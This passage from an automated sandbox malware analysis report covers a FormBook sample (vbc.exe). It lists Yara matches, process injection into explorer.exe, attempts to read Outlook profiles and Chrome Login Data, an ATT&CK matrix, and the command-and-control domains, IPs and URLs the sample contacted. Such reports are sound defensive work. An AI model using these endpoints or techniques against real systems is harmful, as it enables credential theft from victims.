        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Shared Modules        		Path Interception612
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop Protocol11
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
        Process Injection        		NTDS1
        Remote System Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer114
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
        Deobfuscate/Decode Files or Information        		LSA Secrets13
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common3
        Obfuscated Files or Information        		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items13
        Software Packing        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        File Deletion        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680447 Sample: vbc.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 27 www.claudianavarro.online 2->27 29 claudianavarro.online 2->29 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected AntiVM3 2->41 43 5 other signatures 2->43 9 vbc.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\user\AppData\Local\...\vbc.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 vbc.exe 9->13         started        16 vbc.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 13->18 injected process9 dnsIp10 31 www.funwave.info 103.141.97.24, 49796, 80 VECTANTARTERIANetworksCorporationJP Japan 18->31 33 reprograme-se10x.com 108.167.169.56, 49798, 49799, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 3 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        vbc.exe32%ReversingLabsWin32.Trojan.Pwsx
        vbc.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        6.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        www.reliabenefitssupport.com/etn4/0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf0%Avira URL Cloudsafe
        http://www.reprograme-se10x.com/etn4/0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ0%Avira URL Cloudsafe
        http://nginx.net/0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.fontbureau.coma/0%Avira URL Cloudsafe
        http://www.sajatypeworks.comtpuKK0%Avira URL Cloudsafe
        http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.tadeumilhosrp.com/etn4/0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        tadeumilhosrp.com
        		192.185.131.238
        		truetrue
          		unknown
          reprograme-se10x.com
          		108.167.169.56
          		truetrue
            		unknown
            www.funwave.info
            		103.141.97.24
            		truetrue
              		unknown
              claudianavarro.online
              		92.249.45.183
              		truefalse
                		unknown
                www.tadeumilhosrp.com
                		unknown
                		unknowntrue
                  		unknown
                  www.claudianavarro.online
                  		unknown
                  		unknowntrue
                    		unknown
                    www.reprograme-se10x.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.reliabenefitssupport.com/etn4/true
                      • Avira URL Cloud: safe
                      		low
                      http://www.reprograme-se10x.com/etn4/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXBtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvEtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tadeumilhosrp.com/etn4/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyufcontrol.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLjcontrol.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cThevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://nginx.net/control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://fontfabrik.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservicontrol.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/frere-jones.htmlvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.coma/vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fedoraproject.org/control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.sajatypeworks.comtpuKKvbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleasevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleasevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                103.141.97.24
                                                		www.funwave.infoJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                192.185.131.238
                                                		tadeumilhosrp.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                108.167.169.56
                                                		reprograme-se10x.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680447
                                                Start date and time: 08/08/202216:08:122022-08-08 16:08:12 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:vbc.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:21
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@6/2@4/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 87.4%)
                                                • Quality average: 71.9%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 42
                                                • Number of non-executed functions: 168
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 40.125.122.176, 20.54.89.106, 52.242.101.226, 20.223.24.244, 52.152.110.14
